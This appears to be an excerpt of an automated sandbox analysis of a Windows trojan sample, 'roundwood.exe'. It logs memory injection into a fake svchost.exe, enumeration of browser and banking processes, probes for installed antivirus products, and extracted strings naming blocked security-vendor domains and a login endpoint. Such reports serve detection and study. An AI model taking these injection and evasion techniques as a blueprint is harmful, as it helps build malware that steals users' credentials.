Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 20C1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 20C2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2114000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2D20000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2D21000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2D22000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2D74000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: EA0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: EA1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: EA2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: EF4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2C90000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2C91000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2C92000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2CE4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 27D0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 27D1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 27D2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2824000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2954000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2E30000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2E31000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2E32000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2E84000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2F50000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2F51000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2F52000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2FA4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2BD0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2BD1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2BD2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2C24000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Windows\apppatch\svchost.exe base: 3240000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Windows\apppatch\svchost.exe base: 3241000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Windows\apppatch\svchost.exe base: 3242000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Windows\apppatch\svchost.exe base: 3294000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Windows\apppatch\svchost.exe base: 3240000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Windows\apppatch\svchost.exe base: 3241000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Windows\apppatch\svchost.exe base: 3242000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Windows\apppatch\svchost.exe base: 3294000	Jump to behavior

Source: C:\Windows\apppatch\svchost.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	2_2_02D17300
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	4_2_012F7300
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	5_2_00E47300
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	8_2_00E87300

Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4268 -ip 4268	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 984	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4672 -ip 4672	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 708	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6980 -ip 6980	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6980 -s 976	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6300 -ip 6300	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6300 -s 744	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6648 -ip 6648	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5168 -ip 5168	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5616 -ip 5616	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2672 -ip 2672	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe "C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4764 -ip 4764	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3656 -ip 3656	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4460 -ip 4460	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6648 -ip 6648	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2180 -ip 2180	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe "C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe "C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\roundwood.exe	File opened: CA HIPS KmxAgent	Jump to behavior
Source: C:\Users\user\Desktop\roundwood.exe	File opened: Agnitum Outpost firewal \pipe\acsipc_server	Jump to behavior
Source: C:\Users\user\Desktop\roundwood.exe	File opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csi	Jump to behavior
Source: C:\Users\user\Desktop\roundwood.exe	File opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.dat	Jump to behavior
Source: C:\Users\user\Desktop\roundwood.exe	Window found: AVP NULL ____AVP.Root	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	File opened: CA HIPS KmxAgent	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	File opened: Agnitum Outpost firewal \pipe\acsipc_server	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	File opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csi	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	File opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.dat	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Window found: AVP NULL ____AVP.Root	Jump to behavior

Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000004.00000000.2392369672.0000000001711000.00000002.00000001.00040000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000005.00000000.2394956264.0000000001261000.00000002.00000001.00040000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000008.00000000.2415556290.00000000013C1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: roundwood.exe, roundwood.exe, 00000000.00000003.2027860859.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, roundwood.exe, 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2418070085.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000004.00000000.2392369672.0000000001711000.00000002.00000001.00040000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000005.00000000.2394956264.0000000001261000.00000002.00000001.00040000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000008.00000000.2415556290.00000000013C1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: roundwood.exe, 00000000.00000003.2027860859.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, roundwood.exe, 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, svchost.exe, 00000002.00000003.2418070085.0000000003A40000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comkltest.org.rutrendsecureanti-malware.comodo.comavast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comkltest.org.rutrendsecureanti-malware.comodo.comgoogle.comgoogle.comDnsapi.dllDnsQuery_ADnsQuery_UTF8DnsQuery_WQuery_Mainws2_32.dllgetaddrinfogethostbynameinet_addrqwrtpsdfghjklzxcvbnmeyuioa1676d5775e05c50b46baa5579d4fc7;%s%s!verifMozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)/login.php6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9100016d3ad29879a90b4dd1b4f76e82166ca3T2data.txt\....\ntdll.dllZwQuerySystemInformationGlobal\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}fuckGlobal\HighMemoryEvent_%08xexplorer.exeShell_TrayWnd
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000004.00000000.2392369672.0000000001711000.00000002.00000001.00040000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000005.00000000.2394956264.0000000001261000.00000002.00000001.00040000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000008.00000000.2415556290.00000000013C1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\roundwood.exe

Code function: 0_2_00413DA0 cpuid

0_2_00413DA0

Source: C:\Windows\apppatch\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Users\user\Desktop\roundwood.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\roundwood.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
